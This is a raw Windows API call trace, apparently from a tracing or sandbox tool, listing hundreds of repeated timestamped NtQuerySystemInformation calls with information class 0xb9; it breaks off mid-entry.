[0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x20, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x20, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x20, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef98, Length=0x58, ResultLength=0x0) [0227.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x58, ResultLength=0x0) [0227.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec20, Length=0x28, ResultLength=0x0) [0227.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0227.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec00, Length=0x20, ResultLength=0x0) [0227.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb80, Length=0x20, ResultLength=0x0) [0227.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb80, Length=0x20, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb80, Length=0x20, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec00, Length=0x20, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb90, Length=0x20, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb90, Length=0x20, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x58, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec20, Length=0x28, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0227.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0227.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0227.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0227.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0227.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec00, Length=0x20, ResultLength=0x0) [0227.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb90, Length=0x20, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb90, Length=0x20, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x58, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febb0, Length=0x28, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec20, Length=0x28, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feca0, Length=0x28, ResultLength=0x0) [0227.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec00, Length=0x20, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb80, Length=0x20, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb80, Length=0x20, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb80, Length=0x20, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x38, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec00, Length=0x20, ResultLength=0x0) [0227.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb90, Length=0x20, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb90, Length=0x20, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x58, ResultLength=0x0) [0227.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0227.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb80, Length=0x28, ResultLength=0x0) [0227.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb80, Length=0x28, ResultLength=0x0) [0227.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb80, Length=0x28, ResultLength=0x0) [0227.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb80, Length=0x28, ResultLength=0x0) [0227.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febf0, Length=0x28, ResultLength=0x0) [0227.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x28, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x28, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feae0, Length=0x20, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea60, Length=0x20, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea60, Length=0x20, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea60, Length=0x20, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x20, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed40, Length=0x38, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febd0, Length=0x20, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x20, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x20, ResultLength=0x0) [0227.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.926] NtQuerySystemInformation 